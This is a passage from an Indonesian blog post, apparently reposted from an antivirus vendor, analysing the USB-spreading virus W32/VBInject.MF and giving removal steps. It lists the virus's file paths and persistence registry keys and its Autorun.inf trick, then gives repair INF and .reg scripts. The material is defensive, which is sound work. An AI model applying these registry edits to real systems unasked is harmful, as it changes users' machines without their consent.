  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys\

Pesan
Seperti yang kita ketahui, virus lokal sangat kental dengan masalah “asmara” yang biasanya akan disampaikan dalam bentuk pesan-pesan yang akan ditampilkan pada waktu yang telah ditentukan. Begitupun yang dilakukan W32/VBInject.MF yang akan menampilkan pesan baik pada saat komputer booting atau pada waktu yang telah ditentukan. Untuk menampilkan pesan tersebut, ia akan menjalankan file yang berada di direktori   “C:\Windows\system32\Windows.vbs”. (lihat gambar 4 dan 5)
Gambar 4,  pesan yang di tampilkan pada saat booting
Titip Salam buat RIDWAN DAN NITA.
Selamat Buat Kalian Berdua Semoga Bahagia Sepanjang Masa Bahagia Dunia Akherat.
Buat RIDWAN Jaga Dia Baik-baik Jangan Kecewakan Dia, Awas Kalau Macam-macam, Jangan Nyerah.
Buat Anita D.N. Jadilah Istri Yang Baik, Patuh Terhadap Suami, Setia, Satu Lagi NRIMO.
Buat Kalian Berdua Tidak Usah Kawatir Aku Bukan Orang Yang Suka Mengganggu Pasangan Orang Lain Tenang Saja.
Meskipun Masih Pacaran Atau Belum Ada JANUR MELENGKUNG.
Gambar 5, Pesan yang akan ditampilkan oleh W32/VBInject.MF pada waktu yang telah ditentukan
Selain menampilkan pesan di atas, ia juga akan meninggalkan jejak lain dengan menambahkan informasi pada system properties Windows [lihat gambar 6) dengan membuat file yang di simpan di direktori “C:\Windows\system32\oeminfo.ini”
 
Gambar 6, VBInject menambahkan informasi pada “system properties” Windows
Mengenang Tragedi Palang Sepor.
Selamat Buat Kalian Berdua Jadilah.
Yang Terbaik Semoga Bahagia Dunia Akherat.
Banyak Rejeki Banyak Anak Amin

Sragen, 21 Juli 2008
Good Luck !

Selain itu, ia juga akan membuat pesan yang akan di tuangkan pada sebuah file yang akan di simpan di beberapa tempat “%Drive%:\L0r0471.doc & C:\Documents and Settings\All Users\Desktop\L0r0471.doc (%Drive% menunjukan lokasi Drive) (lihat gambar 7)
 
Gambar 7, Pesan L0r0471 yang dituangkan dalam sebuah file

Media Penyebaran
Untuk menyebarkan dirinya, ia akan mengggunakan media flash disk (UFD) atau removable disk dengan membuat 2 buah file dengan nama file “SexyGame.exe” dan Autorun.inf. File Autorun ini sendiri digunakan untuk mengaktifkan file “SexyGame.exe” secara otomastis pada saat user mengakses “flash disk”. (lihat gambar 8)
Gambar 8, Isi script pada file Autorun.inf
Cara membasmi W32/VBinject.MF
  1. Putuskan komputer yang akan dibersihkan dari jaringan
  2. Matikan proses virus yang aktif di memori yang mempunyai nama “GameHouse” dengan menggunakan tools “Security Task Manager” (lihat Gambar 9). Silahkan download tools tersebut di alamat  http://www.neuber.com/taskmanager/
Gambar 9, mematikan proses virus dengan menggunakan Security Task Manager
  1. Perbaiki registri Windows yang sudah diubah oleh virus. Untuk mempermudah proses perbaikan silahkan salin script di bawah  ini pada program “notepad” kemudian simpan dengan nama REPAIR.INF.

Install file tersebut dengan cara : Klik kanan [REPAIR.INF] kemudian klik [Install]
Berikut script yang harus di copy

[Version]
Signature="$Chicago$"
Provider=Vaksincom Oyee
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, UncheckedValue,0x00010001,1
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, UncheckedValue,0x00010001,0
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, CheckedValue,0x00010001,0
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, DefaultValue,0x00010001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, WindowsProtect
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, WindowsUpdate
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer, DisableMSI
HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer, LimitSystemRestoreCheckpointing
HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore
  1. Agar komputer dapat booting safe mode dan safe mode command prompt kembali, salin script  di bawah ini pada program “notepad” kemudian simpan dengan nama FIXSafeMode.reg. Jalankan file tersebut dengan cara klik ganda (klik 2x)  file [FIXSafeMode.reg]
    Berikut script yang harus di salin
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
"AlternateShell"="cmd.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys]
@="FSFilter System Recovery"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys]
@="FSFilter System Recovery"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys]
@="Driver"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys]
@="Driver"
  1. Hapus file virus. Untuk mempermudah penghapusan, sebelum menghapus file virus sebaiknya tampilkan file yang tersembunyi terlebih dahulu dengan cara:
a.       Windows XP
·         Buka [Windows Explorer]
·         Klik menu [Tools]
·         Klik [Folder Options]
·         Klik tabulasi [View]
·         Check list pada opsi [Show hidden files and folders]
·         Hilangkan tanda check list pada opsi [Hide protected operating system files (Recommended)]
·         Klik [Apply | OK]
b.       Windows 7
·         Buka [Windows Explorer]
·         Klik [Organize]
·         Klik [Folder and search options]
·         Pada layar “Folder  Options”, klik tabulasi [View]
·         Check list opsi [Show hidden files, folders and drives]
·         Hilangkan tanda check list pada opsi [Hide protected operating system files (Recommended)]
·         Klik [Apply | OK] (lihat gambar 10)
                                                Gambar 10, menampilkan file yang tersembunyi

Kemudian hapus file berikut:
·         C:\Windows\System32\Windows.vbs
·         C:\windows\System32\oeminfo.ini
·         %Drive%:\L0r0471.doc (%Drive%, menunjukan lokasi  Drive)
·         C:\Documents and Settings\All Users\Desktop\L0r0471.doc
·         C:\Windows\System32\4n174L0r0471.exe
·         C:\SexyGame.exe dan Autorun.inf
Hapus juga file [SexyGame.exe] dan [Autorun.inf] pada Removble media (Flash Disk).
  1. Untuk pembersihan optimal scan dengan antivirus yang sudah terupdate dan mengenali virus ini dengan baik. dikutip dari www.vaksin.com
Diposting oleh iwan s di 3:40:00 PM 0 komentar
Label: , ,
Langganan: Postingan (Atom)

My Son